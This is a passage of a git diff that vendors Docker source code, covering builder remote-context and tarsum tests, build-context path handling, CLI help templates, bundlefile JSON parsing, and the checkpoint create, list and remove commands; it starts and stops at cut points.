[]byte{0xFD, 0x37, 0x7A, 0x58, 0x5A, 0x00} //xz magic + +func TestSelectAcceptableMIME(t *testing.T) { + validMimeStrings := []string{ + "application/x-bzip2", + "application/bzip2", + "application/gzip", + "application/x-gzip", + "application/x-xz", + "application/xz", + "application/tar", + "application/x-tar", + "application/octet-stream", + "text/plain", + } + + invalidMimeStrings := []string{ + "", + "application/octet", + "application/json", + } + + for _, m := range invalidMimeStrings { + if len(selectAcceptableMIME(m)) > 0 { + t.Fatalf("Should not have accepted %q", m) + } + } + + for _, m := range validMimeStrings { + if str := selectAcceptableMIME(m); str == "" { + t.Fatalf("Should have accepted %q", m) + } + } +} + +func TestInspectEmptyResponse(t *testing.T) { + ct := "application/octet-stream" + br := ioutil.NopCloser(bytes.NewReader([]byte(""))) + contentType, bReader, err := inspectResponse(ct, br, 0) + if err == nil { + t.Fatalf("Should have generated an error for an empty response") + } + if contentType != "application/octet-stream" { + t.Fatalf("Content type should be 'application/octet-stream' but is %q", contentType) + } + body, err := ioutil.ReadAll(bReader) + if err != nil { + t.Fatal(err) + } + if len(body) != 0 { + t.Fatal("response body should remain empty") + } +} + +func TestInspectResponseBinary(t *testing.T) { + ct := "application/octet-stream" + br := ioutil.NopCloser(bytes.NewReader(binaryContext)) + contentType, bReader, err := inspectResponse(ct, br, int64(len(binaryContext))) + if err != nil { + t.Fatal(err) + } + if contentType != "application/octet-stream" { + t.Fatalf("Content type should be 'application/octet-stream' but is %q", contentType) + } + body, err := ioutil.ReadAll(bReader) + if err != nil { + t.Fatal(err) + } + if len(body) != len(binaryContext) { + t.Fatalf("Wrong response size %d, should be == len(binaryContext)", len(body)) + } + for i := range body { + if body[i] != binaryContext[i] { + t.Fatalf("Corrupted 
response body at byte index %d", i) + } + } +} + +func TestResponseUnsupportedContentType(t *testing.T) { + content := []byte(dockerfileContents) + ct := "application/json" + br := ioutil.NopCloser(bytes.NewReader(content)) + contentType, bReader, err := inspectResponse(ct, br, int64(len(dockerfileContents))) + + if err == nil { + t.Fatal("Should have returned an error on content-type 'application/json'") + } + if contentType != ct { + t.Fatalf("Should not have altered content-type: orig: %s, altered: %s", ct, contentType) + } + body, err := ioutil.ReadAll(bReader) + if err != nil { + t.Fatal(err) + } + if string(body) != dockerfileContents { + t.Fatalf("Corrupted response body %s", body) + } +} + +func TestInspectResponseTextSimple(t *testing.T) { + content := []byte(dockerfileContents) + ct := "text/plain" + br := ioutil.NopCloser(bytes.NewReader(content)) + contentType, bReader, err := inspectResponse(ct, br, int64(len(content))) + if err != nil { + t.Fatal(err) + } + if contentType != "text/plain" { + t.Fatalf("Content type should be 'text/plain' but is %q", contentType) + } + body, err := ioutil.ReadAll(bReader) + if err != nil { + t.Fatal(err) + } + if string(body) != dockerfileContents { + t.Fatalf("Corrupted response body %s", body) + } +} + +func TestInspectResponseEmptyContentType(t *testing.T) { + content := []byte(dockerfileContents) + br := ioutil.NopCloser(bytes.NewReader(content)) + contentType, bodyReader, err := inspectResponse("", br, int64(len(content))) + if err != nil { + t.Fatal(err) + } + if contentType != "text/plain" { + t.Fatalf("Content type should be 'text/plain' but is %q", contentType) + } + body, err := ioutil.ReadAll(bodyReader) + if err != nil { + t.Fatal(err) + } + if string(body) != dockerfileContents { + t.Fatalf("Corrupted response body %s", body) + } +} + +func TestMakeRemoteContext(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + createTestTempFile(t, contextDir, 
DefaultDockerfileName, dockerfileContents, 0777) + + mux := http.NewServeMux() + server := httptest.NewServer(mux) + serverURL, _ := url.Parse(server.URL) + + serverURL.Path = "/" + DefaultDockerfileName + remoteURL := serverURL.String() + + mux.Handle("/", http.FileServer(http.Dir(contextDir))) + + remoteContext, err := MakeRemoteContext(remoteURL, map[string]func(io.ReadCloser) (io.ReadCloser, error){ + httputils.MimeTypes.TextPlain: func(rc io.ReadCloser) (io.ReadCloser, error) { + dockerfile, err := ioutil.ReadAll(rc) + if err != nil { + return nil, err + } + + r, err := archive.Generate(DefaultDockerfileName, string(dockerfile)) + if err != nil { + return nil, err + } + return ioutil.NopCloser(r), nil + }, + }) + + if err != nil { + t.Fatalf("Error when executing DetectContextFromRemoteURL: %s", err) + } + + if remoteContext == nil { + t.Fatalf("Remote context should not be nil") + } + + tarSumCtx, ok := remoteContext.(*tarSumContext) + + if !ok { + t.Fatalf("Cast error, remote context should be casted to tarSumContext") + } + + fileInfoSums := tarSumCtx.sums + + if fileInfoSums.Len() != 1 { + t.Fatalf("Size of file info sums should be 1, got: %d", fileInfoSums.Len()) + } + + fileInfo := fileInfoSums.GetFile(DefaultDockerfileName) + + if fileInfo == nil { + t.Fatalf("There should be file named %s in fileInfoSums", DefaultDockerfileName) + } + + if fileInfo.Pos() != 0 { + t.Fatalf("File %s should have position 0, got %d", DefaultDockerfileName, fileInfo.Pos()) + } +} diff --git a/vendor/github.com/docker/docker/builder/tarsum.go b/vendor/github.com/docker/docker/builder/tarsum.go new file mode 100644 index 0000000000..35054dcba1 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/tarsum.go @@ -0,0 +1,158 @@ +package builder + +import ( + "fmt" + "io" + "os" + "path/filepath" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/symlink" + 
"github.com/docker/docker/pkg/tarsum" +) + +type tarSumContext struct { + root string + sums tarsum.FileInfoSums +} + +func (c *tarSumContext) Close() error { + return os.RemoveAll(c.root) +} + +func convertPathError(err error, cleanpath string) error { + if err, ok := err.(*os.PathError); ok { + err.Path = cleanpath + return err + } + return err +} + +func (c *tarSumContext) Open(path string) (io.ReadCloser, error) { + cleanpath, fullpath, err := c.normalize(path) + if err != nil { + return nil, err + } + r, err := os.Open(fullpath) + if err != nil { + return nil, convertPathError(err, cleanpath) + } + return r, nil +} + +func (c *tarSumContext) Stat(path string) (string, FileInfo, error) { + cleanpath, fullpath, err := c.normalize(path) + if err != nil { + return "", nil, err + } + + st, err := os.Lstat(fullpath) + if err != nil { + return "", nil, convertPathError(err, cleanpath) + } + + rel, err := filepath.Rel(c.root, fullpath) + if err != nil { + return "", nil, convertPathError(err, cleanpath) + } + + // We set sum to path by default for the case where GetFile returns nil. + // The usual case is if relative path is empty. + sum := path + // Use the checksum of the followed path(not the possible symlink) because + // this is the file that is actually copied. + if tsInfo := c.sums.GetFile(filepath.ToSlash(rel)); tsInfo != nil { + sum = tsInfo.Sum() + } + fi := &HashedFileInfo{PathFileInfo{st, fullpath, filepath.Base(cleanpath)}, sum} + return rel, fi, nil +} + +// MakeTarSumContext returns a build Context from a tar stream. +// +// It extracts the tar stream to a temporary folder that is deleted as soon as +// the Context is closed. +// As the extraction happens, a tarsum is calculated for every file, and the set of +// all those sums then becomes the source of truth for all operations on this Context. +// +// Closing tarStream has to be done by the caller. 
+func MakeTarSumContext(tarStream io.Reader) (ModifiableContext, error) { + root, err := ioutils.TempDir("", "docker-builder") + if err != nil { + return nil, err + } + + tsc := &tarSumContext{root: root} + + // Make sure we clean-up upon error. In the happy case the caller + // is expected to manage the clean-up + defer func() { + if err != nil { + tsc.Close() + } + }() + + decompressedStream, err := archive.DecompressStream(tarStream) + if err != nil { + return nil, err + } + + sum, err := tarsum.NewTarSum(decompressedStream, true, tarsum.Version1) + if err != nil { + return nil, err + } + + if err := chrootarchive.Untar(sum, root, nil); err != nil { + return nil, err + } + + tsc.sums = sum.GetSums() + + return tsc, nil +} + +func (c *tarSumContext) normalize(path string) (cleanpath, fullpath string, err error) { + cleanpath = filepath.Clean(string(os.PathSeparator) + path)[1:] + fullpath, err = symlink.FollowSymlinkInScope(filepath.Join(c.root, path), c.root) + if err != nil { + return "", "", fmt.Errorf("Forbidden path outside the build context: %s (%s)", path, fullpath) + } + _, err = os.Lstat(fullpath) + if err != nil { + return "", "", convertPathError(err, path) + } + return +} + +func (c *tarSumContext) Walk(root string, walkFn WalkFunc) error { + root = filepath.Join(c.root, filepath.Join(string(filepath.Separator), root)) + return filepath.Walk(root, func(fullpath string, info os.FileInfo, err error) error { + rel, err := filepath.Rel(c.root, fullpath) + if err != nil { + return err + } + if rel == "." 
{ + return nil + } + + sum := rel + if tsInfo := c.sums.GetFile(filepath.ToSlash(rel)); tsInfo != nil { + sum = tsInfo.Sum() + } + fi := &HashedFileInfo{PathFileInfo{FileInfo: info, FilePath: fullpath}, sum} + if err := walkFn(rel, fi, nil); err != nil { + return err + } + return nil + }) +} + +func (c *tarSumContext) Remove(path string) error { + _, fullpath, err := c.normalize(path) + if err != nil { + return err + } + return os.RemoveAll(fullpath) +} diff --git a/vendor/github.com/docker/docker/builder/tarsum_test.go b/vendor/github.com/docker/docker/builder/tarsum_test.go new file mode 100644 index 0000000000..278e5830de --- /dev/null +++ b/vendor/github.com/docker/docker/builder/tarsum_test.go @@ -0,0 +1,265 @@ +package builder + +import ( + "bufio" + "bytes" + "io/ioutil" + "os" + "path/filepath" + "testing" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/reexec" +) + +const ( + filename = "test" + contents = "contents test" +) + +func init() { + reexec.Init() +} + +func TestCloseRootDirectory(t *testing.T) { + contextDir, err := ioutil.TempDir("", "builder-tarsum-test") + + if err != nil { + t.Fatalf("Error with creating temporary directory: %s", err) + } + + tarsum := &tarSumContext{root: contextDir} + + err = tarsum.Close() + + if err != nil { + t.Fatalf("Error while executing Close: %s", err) + } + + _, err = os.Stat(contextDir) + + if !os.IsNotExist(err) { + t.Fatalf("Directory should not exist at this point") + defer os.RemoveAll(contextDir) + } +} + +func TestOpenFile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + createTestTempFile(t, contextDir, filename, contents, 0777) + + tarSum := &tarSumContext{root: contextDir} + + file, err := tarSum.Open(filename) + + if err != nil { + t.Fatalf("Error when executing Open: %s", err) + } + + defer file.Close() + + scanner := bufio.NewScanner(file) + buff := bytes.NewBufferString("") + + for scanner.Scan() { + 
buff.WriteString(scanner.Text()) + } + + if contents != buff.String() { + t.Fatalf("Contents are not equal. Expected: %s, got: %s", contents, buff.String()) + } + +} + +func TestOpenNotExisting(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + tarSum := &tarSumContext{root: contextDir} + + file, err := tarSum.Open("not-existing") + + if file != nil { + t.Fatal("Opened file should be nil") + } + + if !os.IsNotExist(err) { + t.Fatalf("Error when executing Open: %s", err) + } +} + +func TestStatFile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + testFilename := createTestTempFile(t, contextDir, filename, contents, 0777) + + tarSum := &tarSumContext{root: contextDir} + + relPath, fileInfo, err := tarSum.Stat(filename) + + if err != nil { + t.Fatalf("Error when executing Stat: %s", err) + } + + if relPath != filename { + t.Fatalf("Relative path should be equal to %s, got %s", filename, relPath) + } + + if fileInfo.Path() != testFilename { + t.Fatalf("Full path should be equal to %s, got %s", testFilename, fileInfo.Path()) + } +} + +func TestStatSubdir(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") + + testFilename := createTestTempFile(t, contextSubdir, filename, contents, 0777) + + tarSum := &tarSumContext{root: contextDir} + + relativePath, err := filepath.Rel(contextDir, testFilename) + + if err != nil { + t.Fatalf("Error when getting relative path: %s", err) + } + + relPath, fileInfo, err := tarSum.Stat(relativePath) + + if err != nil { + t.Fatalf("Error when executing Stat: %s", err) + } + + if relPath != relativePath { + t.Fatalf("Relative path should be equal to %s, got %s", relativePath, relPath) + } + + if fileInfo.Path() != testFilename { + t.Fatalf("Full path should be equal to %s, got %s", 
testFilename, fileInfo.Path()) + } +} + +func TestStatNotExisting(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + tarSum := &tarSumContext{root: contextDir} + + relPath, fileInfo, err := tarSum.Stat("not-existing") + + if relPath != "" { + t.Fatal("Relative path should be nil") + } + + if fileInfo != nil { + t.Fatalf("File info should be nil") + } + + if !os.IsNotExist(err) { + t.Fatalf("This file should not exist: %s", err) + } +} + +func TestRemoveDirectory(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") + + relativePath, err := filepath.Rel(contextDir, contextSubdir) + + if err != nil { + t.Fatalf("Error when getting relative path: %s", err) + } + + tarSum := &tarSumContext{root: contextDir} + + err = tarSum.Remove(relativePath) + + if err != nil { + t.Fatalf("Error when executing Remove: %s", err) + } + + _, err = os.Stat(contextSubdir) + + if !os.IsNotExist(err) { + t.Fatalf("Directory should not exist at this point") + } +} + +func TestMakeTarSumContext(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + createTestTempFile(t, contextDir, filename, contents, 0777) + + tarStream, err := archive.Tar(contextDir, archive.Uncompressed) + + if err != nil { + t.Fatalf("error: %s", err) + } + + defer tarStream.Close() + + tarSum, err := MakeTarSumContext(tarStream) + + if err != nil { + t.Fatalf("Error when executing MakeTarSumContext: %s", err) + } + + if tarSum == nil { + t.Fatalf("Tar sum context should not be nil") + } +} + +func TestWalkWithoutError(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") + + createTestTempFile(t, contextSubdir, filename, contents, 
0777) + + tarSum := &tarSumContext{root: contextDir} + + walkFun := func(path string, fi FileInfo, err error) error { + return nil + } + + err := tarSum.Walk(contextSubdir, walkFun) + + if err != nil { + t.Fatalf("Error when executing Walk: %s", err) + } +} + +type WalkError struct { +} + +func (we WalkError) Error() string { + return "Error when executing Walk" +} + +func TestWalkWithError(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") + + tarSum := &tarSumContext{root: contextDir} + + walkFun := func(path string, fi FileInfo, err error) error { + return WalkError{} + } + + err := tarSum.Walk(contextSubdir, walkFun) + + if err == nil { + t.Fatalf("Error should not be nil") + } +} diff --git a/vendor/github.com/docker/docker/builder/utils_test.go b/vendor/github.com/docker/docker/builder/utils_test.go new file mode 100644 index 0000000000..1101ff1d1d --- /dev/null +++ b/vendor/github.com/docker/docker/builder/utils_test.go @@ -0,0 +1,87 @@ +package builder + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +const ( + dockerfileContents = "FROM busybox" + dockerignoreFilename = ".dockerignore" + testfileContents = "test" +) + +// createTestTempDir creates a temporary directory for testing. +// It returns the created path and a cleanup function which is meant to be used as deferred call. +// When an error occurs, it terminates the test. +func createTestTempDir(t *testing.T, dir, prefix string) (string, func()) { + path, err := ioutil.TempDir(dir, prefix) + + if err != nil { + t.Fatalf("Error when creating directory %s with prefix %s: %s", dir, prefix, err) + } + + return path, func() { + err = os.RemoveAll(path) + + if err != nil { + t.Fatalf("Error when removing directory %s: %s", path, err) + } + } +} + +// createTestTempSubdir creates a temporary directory for testing. 
+// It returns the created path but doesn't provide a cleanup function, +// so createTestTempSubdir should be used only for creating temporary subdirectories +// whose parent directories are properly cleaned up. +// When an error occurs, it terminates the test. +func createTestTempSubdir(t *testing.T, dir, prefix string) string { + path, err := ioutil.TempDir(dir, prefix) + + if err != nil { + t.Fatalf("Error when creating directory %s with prefix %s: %s", dir, prefix, err) + } + + return path +} + +// createTestTempFile creates a temporary file within dir with specific contents and permissions. +// When an error occurs, it terminates the test +func createTestTempFile(t *testing.T, dir, filename, contents string, perm os.FileMode) string { + filePath := filepath.Join(dir, filename) + err := ioutil.WriteFile(filePath, []byte(contents), perm) + + if err != nil { + t.Fatalf("Error when creating %s file: %s", filename, err) + } + + return filePath +} + +// chdir changes current working directory to dir. +// It returns a function which changes working directory back to the previous one. +// This function is meant to be executed as a deferred call. +// When an error occurs, it terminates the test. 
+func chdir(t *testing.T, dir string) func() { + workingDirectory, err := os.Getwd() + + if err != nil { + t.Fatalf("Error when retrieving working directory: %s", err) + } + + err = os.Chdir(dir) + + if err != nil { + t.Fatalf("Error when changing directory to %s: %s", dir, err) + } + + return func() { + err = os.Chdir(workingDirectory) + + if err != nil { + t.Fatalf("Error when changing back to working directory (%s): %s", workingDirectory, err) + } + } +} diff --git a/vendor/github.com/docker/docker/cli/cobra.go b/vendor/github.com/docker/docker/cli/cobra.go new file mode 100644 index 0000000000..139845cb1b --- /dev/null +++ b/vendor/github.com/docker/docker/cli/cobra.go @@ -0,0 +1,139 @@ +package cli + +import ( + "fmt" + "strings" + + "github.com/spf13/cobra" +) + +// SetupRootCommand sets default usage, help, and error handling for the +// root command. +func SetupRootCommand(rootCmd *cobra.Command) { + cobra.AddTemplateFunc("hasSubCommands", hasSubCommands) + cobra.AddTemplateFunc("hasManagementSubCommands", hasManagementSubCommands) + cobra.AddTemplateFunc("operationSubCommands", operationSubCommands) + cobra.AddTemplateFunc("managementSubCommands", managementSubCommands) + + rootCmd.SetUsageTemplate(usageTemplate) + rootCmd.SetHelpTemplate(helpTemplate) + rootCmd.SetFlagErrorFunc(FlagErrorFunc) + rootCmd.SetHelpCommand(helpCommand) + + rootCmd.PersistentFlags().BoolP("help", "h", false, "Print usage") + rootCmd.PersistentFlags().MarkShorthandDeprecated("help", "please use --help") +} + +// FlagErrorFunc prints an error message which matches the format of the +// docker/docker/cli error messages +func FlagErrorFunc(cmd *cobra.Command, err error) error { + if err == nil { + return err + } + + usage := "" + if cmd.HasSubCommands() { + usage = "\n\n" + cmd.UsageString() + } + return StatusError{ + Status: fmt.Sprintf("%s\nSee '%s --help'.%s", err, cmd.CommandPath(), usage), + StatusCode: 125, + } +} + +var helpCommand = &cobra.Command{ + Use: "help [command]", 
+ Short: "Help about the command", + PersistentPreRun: func(cmd *cobra.Command, args []string) {}, + PersistentPostRun: func(cmd *cobra.Command, args []string) {}, + RunE: func(c *cobra.Command, args []string) error { + cmd, args, e := c.Root().Find(args) + if cmd == nil || e != nil || len(args) > 0 { + return fmt.Errorf("unknown help topic: %v", strings.Join(args, " ")) + } + + helpFunc := cmd.HelpFunc() + helpFunc(cmd, args) + return nil + }, +} + +func hasSubCommands(cmd *cobra.Command) bool { + return len(operationSubCommands(cmd)) > 0 +} + +func hasManagementSubCommands(cmd *cobra.Command) bool { + return len(managementSubCommands(cmd)) > 0 +} + +func operationSubCommands(cmd *cobra.Command) []*cobra.Command { + cmds := []*cobra.Command{} + for _, sub := range cmd.Commands() { + if sub.IsAvailableCommand() && !sub.HasSubCommands() { + cmds = append(cmds, sub) + } + } + return cmds +} + +func managementSubCommands(cmd *cobra.Command) []*cobra.Command { + cmds := []*cobra.Command{} + for _, sub := range cmd.Commands() { + if sub.IsAvailableCommand() && sub.HasSubCommands() { + cmds = append(cmds, sub) + } + } + return cmds +} + +var usageTemplate = `Usage: + +{{- if not .HasSubCommands}} {{.UseLine}}{{end}} +{{- if .HasSubCommands}} {{ .CommandPath}} COMMAND{{end}} + +{{ .Short | trim }} + +{{- if gt .Aliases 0}} + +Aliases: + {{.NameAndAliases}} + +{{- end}} +{{- if .HasExample}} + +Examples: +{{ .Example }} + +{{- end}} +{{- if .HasFlags}} + +Options: +{{.Flags.FlagUsages | trimRightSpace}} + +{{- end}} +{{- if hasManagementSubCommands . }} + +Management Commands: + +{{- range managementSubCommands . }} + {{rpad .Name .NamePadding }} {{.Short}} +{{- end}} + +{{- end}} +{{- if hasSubCommands .}} + +Commands: + +{{- range operationSubCommands . }} + {{rpad .Name .NamePadding }} {{.Short}} +{{- end}} +{{- end}} + +{{- if .HasSubCommands }} + +Run '{{.CommandPath}} COMMAND --help' for more information on a command. 
+{{- end}} +` + +var helpTemplate = ` +{{if or .Runnable .HasSubCommands}}{{.UsageString}}{{end}}` diff --git a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go new file mode 100644 index 0000000000..7fd1e4f6c4 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go @@ -0,0 +1,69 @@ +package bundlefile + +import ( + "encoding/json" + "fmt" + "io" +) + +// Bundlefile stores the contents of a bundlefile +type Bundlefile struct { + Version string + Services map[string]Service +} + +// Service is a service from a bundlefile +type Service struct { + Image string + Command []string `json:",omitempty"` + Args []string `json:",omitempty"` + Env []string `json:",omitempty"` + Labels map[string]string `json:",omitempty"` + Ports []Port `json:",omitempty"` + WorkingDir *string `json:",omitempty"` + User *string `json:",omitempty"` + Networks []string `json:",omitempty"` +} + +// Port is a port as defined in a bundlefile +type Port struct { + Protocol string + Port uint32 +} + +// LoadFile loads a bundlefile from a path to the file +func LoadFile(reader io.Reader) (*Bundlefile, error) { + bundlefile := &Bundlefile{} + + decoder := json.NewDecoder(reader) + if err := decoder.Decode(bundlefile); err != nil { + switch jsonErr := err.(type) { + case *json.SyntaxError: + return nil, fmt.Errorf( + "JSON syntax error at byte %v: %s", + jsonErr.Offset, + jsonErr.Error()) + case *json.UnmarshalTypeError: + return nil, fmt.Errorf( + "Unexpected type at byte %v. 
Expected %s but received %s.", + jsonErr.Offset, + jsonErr.Type, + jsonErr.Value) + } + return nil, err + } + + return bundlefile, nil +} + +// Print writes the contents of the bundlefile to the output writer +// as human readable json +func Print(out io.Writer, bundle *Bundlefile) error { + bytes, err := json.MarshalIndent(*bundle, "", " ") + if err != nil { + return err + } + + _, err = out.Write(bytes) + return err +} diff --git a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go new file mode 100644 index 0000000000..c343410df3 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go @@ -0,0 +1,77 @@ +package bundlefile + +import ( + "bytes" + "strings" + "testing" + + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestLoadFileV01Success(t *testing.T) { + reader := strings.NewReader(`{ + "Version": "0.1", + "Services": { + "redis": { + "Image": "redis@sha256:4b24131101fa0117bcaa18ac37055fffd9176aa1a240392bb8ea85e0be50f2ce", + "Networks": ["default"] + }, + "web": { + "Image": "dockercloud/hello-world@sha256:fe79a2cfbd17eefc344fb8419420808df95a1e22d93b7f621a7399fd1e9dca1d", + "Networks": ["default"], + "User": "web" + } + } + }`) + + bundle, err := LoadFile(reader) + assert.NilError(t, err) + assert.Equal(t, bundle.Version, "0.1") + assert.Equal(t, len(bundle.Services), 2) +} + +func TestLoadFileSyntaxError(t *testing.T) { + reader := strings.NewReader(`{ + "Version": "0.1", + "Services": unquoted string + }`) + + _, err := LoadFile(reader) + assert.Error(t, err, "syntax error at byte 37: invalid character 'u'") +} + +func TestLoadFileTypeError(t *testing.T) { + reader := strings.NewReader(`{ + "Version": "0.1", + "Services": { + "web": { + "Image": "redis", + "Networks": "none" + } + } + }`) + + _, err := LoadFile(reader) + assert.Error(t, err, "Unexpected type at byte 94. 
Expected []string but received string") +} + +func TestPrint(t *testing.T) { + var buffer bytes.Buffer + bundle := &Bundlefile{ + Version: "0.1", + Services: map[string]Service{ + "web": { + Image: "image", + Command: []string{"echo", "something"}, + }, + }, + } + assert.NilError(t, Print(&buffer, bundle)) + output := buffer.String() + assert.Contains(t, output, "\"Image\": \"image\"") + assert.Contains(t, output, + `"Command": [ + "echo", + "something" + ]`) +} diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go b/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go new file mode 100644 index 0000000000..d5705a4dad --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go @@ -0,0 +1,24 @@ +package checkpoint + +import ( + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +// NewCheckpointCommand returns the `checkpoint` subcommand (only in experimental) +func NewCheckpointCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "checkpoint", + Short: "Manage checkpoints", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + Tags: map[string]string{"experimental": "", "version": "1.25"}, + } + cmd.AddCommand( + newCreateCommand(dockerCli), + newListCommand(dockerCli), + newRemoveCommand(dockerCli), + ) + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/create.go b/vendor/github.com/docker/docker/cli/command/checkpoint/create.go new file mode 100644 index 0000000000..473a941733 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/checkpoint/create.go @@ -0,0 +1,58 @@ +package checkpoint + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type createOptions struct { + container string + checkpoint string + checkpointDir string + leaveRunning 
bool +} + +func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts createOptions + + cmd := &cobra.Command{ + Use: "create [OPTIONS] CONTAINER CHECKPOINT", + Short: "Create a checkpoint from a running container", + Args: cli.ExactArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + opts.container = args[0] + opts.checkpoint = args[1] + return runCreate(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.BoolVar(&opts.leaveRunning, "leave-running", false, "Leave the container running after checkpoint") + flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory") + + return cmd +} + +func runCreate(dockerCli *command.DockerCli, opts createOptions) error { + client := dockerCli.Client() + + checkpointOpts := types.CheckpointCreateOptions{ + CheckpointID: opts.checkpoint, + CheckpointDir: opts.checkpointDir, + Exit: !opts.leaveRunning, + } + + err := client.CheckpointCreate(context.Background(), opts.container, checkpointOpts) + if err != nil { + return err + } + + fmt.Fprintf(dockerCli.Out(), "%s\n", opts.checkpoint) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/list.go b/vendor/github.com/docker/docker/cli/command/checkpoint/list.go new file mode 100644 index 0000000000..daf8349993 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/checkpoint/list.go @@ -0,0 +1,62 @@ +package checkpoint + +import ( + "fmt" + "text/tabwriter" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type listOptions struct { + checkpointDir string +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts listOptions + + cmd := &cobra.Command{ + Use: "ls [OPTIONS] CONTAINER", + Aliases: []string{"list"}, + Short: "List checkpoints for a container", + Args: cli.ExactArgs(1), + RunE: func(cmd 
*cobra.Command, args []string) error { + return runList(dockerCli, args[0], opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory") + + return cmd + +} + +func runList(dockerCli *command.DockerCli, container string, opts listOptions) error { + client := dockerCli.Client() + + listOpts := types.CheckpointListOptions{ + CheckpointDir: opts.checkpointDir, + } + + checkpoints, err := client.CheckpointList(context.Background(), container, listOpts) + if err != nil { + return err + } + + w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) + fmt.Fprintf(w, "CHECKPOINT NAME") + fmt.Fprintf(w, "\n") + + for _, checkpoint := range checkpoints { + fmt.Fprintf(w, "%s\t", checkpoint.Name) + fmt.Fprint(w, "\n") + } + + w.Flush() + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go b/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go new file mode 100644 index 0000000000..ec39fa7b55 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go @@ -0,0 +1,44 @@ +package checkpoint + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type removeOptions struct { + checkpointDir string +} + +func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts removeOptions + + cmd := &cobra.Command{ + Use: "rm [OPTIONS] CONTAINER CHECKPOINT", + Aliases: []string{"remove"}, + Short: "Remove a checkpoint", + Args: cli.ExactArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + return runRemove(dockerCli, args[0], args[1], opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory") + + return cmd +} + +func runRemove(dockerCli *command.DockerCli, container string, 
checkpoint string, opts removeOptions) error { + client := dockerCli.Client() + + removeOpts := types.CheckpointDeleteOptions{ + CheckpointID: checkpoint, + CheckpointDir: opts.checkpointDir, + } + + return client.CheckpointDelete(context.Background(), container, removeOpts) +} diff --git a/vendor/github.com/docker/docker/cli/command/cli.go b/vendor/github.com/docker/docker/cli/command/cli.go new file mode 100644 index 0000000000..6d1dd7472e --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/cli.go @@ -0,0 +1,260 @@ +package command + +import ( + "errors" + "fmt" + "io" + "net/http" + "os" + "path/filepath" + "runtime" + + "github.com/docker/docker/api" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + cliflags "github.com/docker/docker/cli/flags" + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/cliconfig/configfile" + "github.com/docker/docker/cliconfig/credentials" + "github.com/docker/docker/client" + "github.com/docker/docker/dockerversion" + dopts "github.com/docker/docker/opts" 